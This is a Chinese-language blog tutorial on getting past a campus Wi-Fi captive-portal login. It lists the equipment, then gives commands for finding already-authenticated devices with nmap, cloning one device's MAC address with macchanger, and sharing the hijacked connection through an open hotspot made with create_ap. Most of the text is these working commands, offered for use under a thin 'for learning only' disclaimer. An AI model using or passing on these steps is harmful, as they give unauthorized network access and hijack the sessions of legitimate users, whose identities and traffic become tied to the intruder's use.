本文仅供学习,请勿用于任何违法行为
引言
现在很多地方都有公共wifi,但是很烦人的是很多免费wifi都需要登陆认证,那种微信认证还好,至少能用,但是在某些地方,比如校园内,往往需要正确的账号密码才能获取网络权限,本文就以校园wifi为例子,尝试绕过这个认证系统
装备
树莓派PI3 B+(内置kali linux)
充电宝
无线网卡
手机(包含termius和终端模拟器)
数据线
核心原理
把网卡的mac地址改为某个已通过认证的设备的mac地址,欺骗服务器达到绕过验证的目的
灵感来源 https://www.youtube.com/watch?v=taAD2z8spP0
前期准备
安装macchanger
apt-get install macchanger
安装create_ap以及所需要的支持库(用于开启热点)
git clone https://github.com/oblique/create_ap
cd create_ap
make install
apt-get install util-linux procps hostapd iproute2 iw haveged dnsmasq
步骤1 ssh连接进入树莓派
综合了众多因素之后,笔者决定使用手机连接进入树莓派
主要原理是通过usb共享网络的方式让树莓派进入局域网内,然后通过查arp获取它的内网ip,再通过termius进行ssh连接
连接
首先连线,在手机上开启usb流量共享
终端模拟器中输入
cat /proc/net/arp
查看树莓派的内网ip
在termius中输入ip,连接进入
(为了截屏方便,下面的操作将在电脑上用xshell演示,并用手机开热点模拟需要登录认证的免费wifi)
寻找已认证的mac地址
这里可以使用kali自带的nmap,扫描局域网内存活的设备即可(当然也可以用airodump,只是用那个会稍微麻烦点)
nmap -sP xxx.xxx.xxx.1/24
然后寻找一个心仪的目标即可
修改mac并连接
网卡:
wlan0为树莓派自带的网卡(用于获取网络权限)
wlan1为外接网卡,用于开热点
wlan2为外接网卡,用于连接家中的wifi然后通过局域网ssh操作树莓派
首先关闭network-manager服务(会影响用终端连接wifi)
service network-manager stop
然后更改mac地址(这里设B8:27:EB:59:5C:20为已通过认证的MAC地址)
ifconfig wlan0 down
macchanger -m B8:27:EB:59:5C:20 wlan0
ifconfig wlan0 up
接着连接wifi(这里设免费wifi ssid为WIFI)
此时已成功连接免费wifi,在真正操作时,连接完成后还应测试一下是否能联网(比如ping www.baidu.com)
开热点造福人类
这里用create_ap工具即可
create_ap wlan1 wlan0 FREE-WIFI
当然,也可以选择加个密码,具体的命令可以去看命令提示
最后,手机连接,正常上网
本文仅供学习,请勿用于任何违法行为